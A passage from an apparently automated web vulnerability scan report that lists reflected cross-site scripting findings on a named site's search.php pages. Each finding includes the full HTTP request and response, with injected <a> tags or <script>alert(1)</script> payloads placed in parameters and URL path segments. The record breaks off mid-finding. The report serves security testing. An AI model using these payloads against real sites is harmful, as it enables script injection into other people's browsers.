GET /detail/4/themes/kosmos/images/search.php?keyword=search...&Submit3=Searchff4c9<a>cc91c080e89&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/4/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4/themes/kosmos/images/search.php?keyword=search...&Submit3=Searchff4c9<a>cc91c080e89&opt=2 was not found on this server.</p>
...[SNIP]...

2.2794. http://www.resellerbase.com/detail/4/themes/kosmos/images/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/4/themes/kosmos/images/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 5be00<a>da0f00c678f was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/4/themes/kosmos/images/search.php?keyword=search...5be00<a>da0f00c678f&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/4/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4/themes/kosmos/images/search.php?keyword=search...5be00<a>da0f00c678f&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2795. http://www.resellerbase.com/detail/4/themes/kosmos/images/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/4/themes/kosmos/images/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 637cf<script>alert(1)</script>3e7fb7248a7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/4/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&637cf<script>alert(1)</script>3e7fb7248a7=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/4/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&637cf<script>alert(1)</script>3e7fb7248a7=1 was not found on this server.</p>
...[SNIP]...

2.2796. http://www.resellerbase.com/detail/4/themes/kosmos/images/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/4/themes/kosmos/images/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload b113c<a>c67168d0cca was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/4/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2b113c<a>c67168d0cca HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/4/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2b113c<a>c67168d0cca was not found on this server.</p>
...[SNIP]...

2.2797. http://www.resellerbase.com/detail/4/themes/kosmos/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/4/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9a7bc<script>alert(1)</script>781e1afce1f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail9a7bc<script>alert(1)</script>781e1afce1f/4/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/4/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail9a7bc<script>alert(1)</script>781e1afce1f/4/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2798. http://www.resellerbase.com/detail/4/themes/kosmos/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/4/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 40546<script>alert(1)</script>368659ab562 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/440546<script>alert(1)</script>368659ab562/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/4/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/440546<script>alert(1)</script>368659ab562/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2799. http://www.resellerbase.com/detail/4/themes/kosmos/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/4/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload a286c<script>alert(1)</script>bad01f69978 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/4/themesa286c<script>alert(1)</script>bad01f69978/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/4/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4/themesa286c<script>alert(1)</script>bad01f69978/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2800. http://www.resellerbase.com/detail/4/themes/kosmos/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/4/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 15d97<script>alert(1)</script>52b28975d9f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/4/themes/kosmos15d97<script>alert(1)</script>52b28975d9f/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/4/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4/themes/kosmos15d97<script>alert(1)</script>52b28975d9f/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2801. http://www.resellerbase.com/detail/4/themes/kosmos/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/4/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 6915a<script>alert(1)</script>be675873c00 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/4/themes/kosmos/search.php6915a<script>alert(1)</script>be675873c00?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/4/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4/themes/kosmos/search.php6915a<script>alert(1)</script>be675873c00?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2802. http://www.resellerbase.com/detail/4/themes/kosmos/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/4/themes/kosmos/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 4c35d<a>e4f5c423018 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/4/themes/kosmos/search.php?keyword=search...&Submit3=Search4c35d<a>e4f5c423018&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/4/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4/themes/kosmos/search.php?keyword=search...&Submit3=Search4c35d<a>e4f5c423018&opt=2 was not found on this server.</p>
...[SNIP]...

2.2803. http://www.resellerbase.com/detail/4/themes/kosmos/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/4/themes/kosmos/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload c524f<a>18b66a64a46 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/4/themes/kosmos/search.php?keyword=search...c524f<a>18b66a64a46&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/4/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4/themes/kosmos/search.php?keyword=search...c524f<a>18b66a64a46&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2804. http://www.resellerbase.com/detail/4/themes/kosmos/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/4/themes/kosmos/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 3664c<script>alert(1)</script>7090ebdb600 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/4/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&3664c<script>alert(1)</script>7090ebdb600=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/4/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&3664c<script>alert(1)</script>7090ebdb600=1 was not found on this server.</p>
...[SNIP]...

2.2805. http://www.resellerbase.com/detail/4/themes/kosmos/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/4/themes/kosmos/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload ff9f7<a>86aa1ec3894 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/4/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2ff9f7<a>86aa1ec3894 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/4/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2ff9f7<a>86aa1ec3894 was not found on this server.</p>
...[SNIP]...

2.2806. http://www.resellerbase.com/detail/4/themes/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/4/themes/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 27912<script>alert(1)</script>7953fd773b9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail27912<script>alert(1)</script>7953fd773b9/4/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/4/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail27912<script>alert(1)</script>7953fd773b9/4/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2807. http://www.resellerbase.com/detail/4/themes/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/4/themes/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5945c<script>alert(1)</script>6d45da52530 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/45945c<script>alert(1)</script>6d45da52530/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/4/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/45945c<script>alert(1)</script>6d45da52530/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2808. http://www.resellerbase.com/detail/4/themes/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/4/themes/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload dbe7c<script>alert(1)</script>094cd37627f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/4/themesdbe7c<script>alert(1)</script>094cd37627f/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/4/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4/themesdbe7c<script>alert(1)</script>094cd37627f/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2809. http://www.resellerbase.com/detail/4/themes/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/4/themes/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload cde87<script>alert(1)</script>277a7e581e7 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/4/themes/search.phpcde87<script>alert(1)</script>277a7e581e7?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/4/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4/themes/search.phpcde87<script>alert(1)</script>277a7e581e7?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2810. http://www.resellerbase.com/detail/4/themes/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/4/themes/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 2e084<a>f2c8814586e was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/4/themes/search.php?keyword=search...&Submit3=Search2e084<a>f2c8814586e&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/4/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4/themes/search.php?keyword=search...&Submit3=Search2e084<a>f2c8814586e&opt=2 was not found on this server.</p>
...[SNIP]...

2.2811. http://www.resellerbase.com/detail/4/themes/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/4/themes/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload a1d46<a>4a4949183b7 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

